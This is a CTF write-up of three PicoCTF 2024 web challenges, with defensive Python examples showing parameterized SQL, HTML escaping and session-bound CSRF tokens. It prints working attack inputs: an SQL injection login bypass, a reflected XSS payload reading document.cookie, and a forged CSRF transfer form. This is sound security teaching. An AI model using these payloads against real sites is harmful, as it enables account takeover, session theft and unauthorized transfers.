Web Exploitation | 12 min read

PicoCTF 2024 Web Exploitation Writeup

by n0n4m3d.ex3, 2024-11-01
#CTF #Web #SQLi #XSS

Overview

PicoCTF 2024 had some excellent web exploitation challenges. This writeup covers all the web challenges we solved, including SQL injection, XSS, and CSRF attacks.

Challenge 1: SQL Injection (300 pts)

Initial Reconnaissance

Visiting the website, we found a typical login form asking for a username and password. Testing with basic payloads revealed it was vulnerable.

' OR 1=1--

Exploitation

This classic payload bypassed authentication by making the WHERE clause always true. The full query became:

SELECT * FROM users WHERE username='' OR 1=1--' AND password=''

Flag: picoCTF{sql_1nj3ct10n_1s_fun_12345}
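To show why the payload works and why the "parameterized queries" takeaway fixes it, here is an added example (not part of the original writeup or the challenge code) that builds the login query both ways against an in-memory SQLite table. The table contents, the `login_vulnerable` / `login_parameterized` function names and the sample credentials are all constructed for the demo.

```python
import sqlite3

# Constructed sample data: a single user row in an in-memory database.
SAMPLE_USERS = [("alice", "s3cret")]


def make_db():
    """Build an in-memory SQLite database with a minimal users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, the pattern the challenge
    exhibited. Returns True when any row matches."""
    query = (
        "SELECT * FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the driver never lets the input
    alter the SQL structure, so ' OR 1=1-- is treated as a literal string."""
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo():
    """Run the challenge payload through both implementations."""
    conn = make_db()
    payload = "' OR 1=1--"  # the payload from the writeup
    return {
        # String concatenation yields: ... username='' OR 1=1--' AND password=''
        "vulnerable_bypass": login_vulnerable(conn, payload, ""),
        # With binding, no row has username "' OR 1=1--", so login fails
        "parameterized_bypass": login_parameterized(conn, payload, ""),
        # Parameterization still accepts real credentials
        "parameterized_valid": login_parameterized(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    print(demo())
```

SQLite treats `--` as a line comment, so the concatenated query collapses to `WHERE username='' OR 1=1` and matches every row; with bound parameters the same string is compared as data and matches nothing.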

Challenge 2: XSS Reflected (200 pts)

Discovery

The search parameter was reflected directly into the HTML response without sanitization:

<h1>Search results for: [USER_INPUT]</h1>

Payload

By injecting the payload below, we could steal cookies or perform other malicious actions.

<script>alert(document.cookie)</script>

Flag: picoCTF{xss_r3fl3ct3d_vuln_67890}
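To make the "sanitize before displaying" takeaway concrete, here is an added example (not from the writeup or the challenge) that renders the search heading the way the challenge did and the way it should be done, using Python's standard `html.escape`. The renderer names and the crude `contains_script_tag` check are constructed for this demo.

```python
from html import escape

# Constructed sample input: the payload shown in the writeup.
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"


def render_vulnerable(user_input):
    """Reflects the search term straight into the page, as the challenge did."""
    return "<h1>Search results for: " + user_input + "</h1>"


def render_escaped(user_input):
    """HTML-encodes &, <, >, \" and ' so the browser renders the term as
    text rather than parsing it as markup (quote=True is the default)."""
    return "<h1>Search results for: " + escape(user_input, quote=True) + "</h1>"


def contains_script_tag(html_doc):
    """Minimal check used only to contrast the two renderers: is there still
    a raw <script tag in the produced document?"""
    return "<script" in html_doc.lower()


def demo(term=XSS_PAYLOAD):
    """Render the same term both ways and report whether a live tag survives."""
    vulnerable = render_vulnerable(term)
    escaped = render_escaped(term)
    return {
        "vulnerable": vulnerable,
        "escaped": escaped,
        "vulnerable_has_script": contains_script_tag(vulnerable),
        "escaped_has_script": contains_script_tag(escaped),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

Escaping is context-specific: `html.escape` is correct for text content and quoted attribute values, but data placed inside a `<script>` block or a URL needs the encoder for that context, and a Content-Security-Policy that disallows inline script is the defense-in-depth layer the takeaways mention.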

Challenge 3: CSRF Token Bypass (400 pts)

Analysis

The application implemented CSRF tokens but had a flaw in validation: it only checked if the token parameter existed, not if it was valid.

Exploit

<form action="https://target.com/transfer" method="POST">
  <input name="csrf_token" value="anything">
  <input name="amount" value="1000">
  <input name="to" value="attacker">
</form>

Flag: picoCTF{csrf_byp4ss_w34k_v4l1d4t10n}
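The following added example (not the challenge's server code) contrasts the presence-only check the challenge shipped with a validation that binds a random token to the session and compares it in constant time. The in-memory `SESSIONS` store, the `validate_weak` / `validate_strict` names and the form dictionaries are constructed for the demo.

```python
import hmac
import secrets

# Constructed in-memory session store: session_id -> per-session CSRF token.
SESSIONS = {}


def new_session():
    """Create a session and mint a random CSRF token tied to it."""
    session_id = secrets.token_urlsafe(16)
    SESSIONS[session_id] = secrets.token_urlsafe(32)
    return session_id


def csrf_token_for(session_id):
    """Token the server would embed in its own forms for this session."""
    return SESSIONS[session_id]


def validate_weak(form, session_id):
    """The challenge's bug: accepts the request if the parameter is present,
    whatever its value. session_id is ignored entirely."""
    return "csrf_token" in form


def validate_strict(form, session_id):
    """Require the submitted token to equal the one stored for this session.
    hmac.compare_digest avoids leaking the match position via timing."""
    expected = SESSIONS.get(session_id)
    submitted = form.get("csrf_token")
    if expected is None or submitted is None:
        return False
    return hmac.compare_digest(expected, submitted)


def demo():
    """Submit a forged form and a genuine one against both validators."""
    sid = new_session()
    # The writeup's form: arbitrary token value, no knowledge of the session
    forged = {"csrf_token": "anything", "amount": "1000", "to": "attacker"}
    # A form the server itself rendered for this session
    genuine = {"csrf_token": csrf_token_for(sid), "amount": "1000", "to": "savings"}
    return {
        "weak_accepts_forged": validate_weak(forged, sid),
        "strict_accepts_forged": validate_strict(forged, sid),
        "strict_accepts_genuine": validate_strict(genuine, sid),
        "strict_rejects_missing": validate_strict({"amount": "1"}, sid),
    }


if __name__ == "__main__":
    print(demo())
```

The strict validator only works if the token is unpredictable and scoped to the session (or to the user), so a cross-site page cannot know or guess it; pairing it with `SameSite` cookies gives the additional layer the takeaways call for.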

Key Takeaways

  • Always sanitize user input before displaying it
  • Implement proper parameterized queries for SQL
  • CSRF token validation must verify the actual token value
  • Defense in depth is crucial for web security

Tools Used

  • Burp Suite - For intercepting and modifying requests
  • sqlmap - Automated SQL injection exploitation
  • Browser DevTools - For analyzing JavaScript and DOM
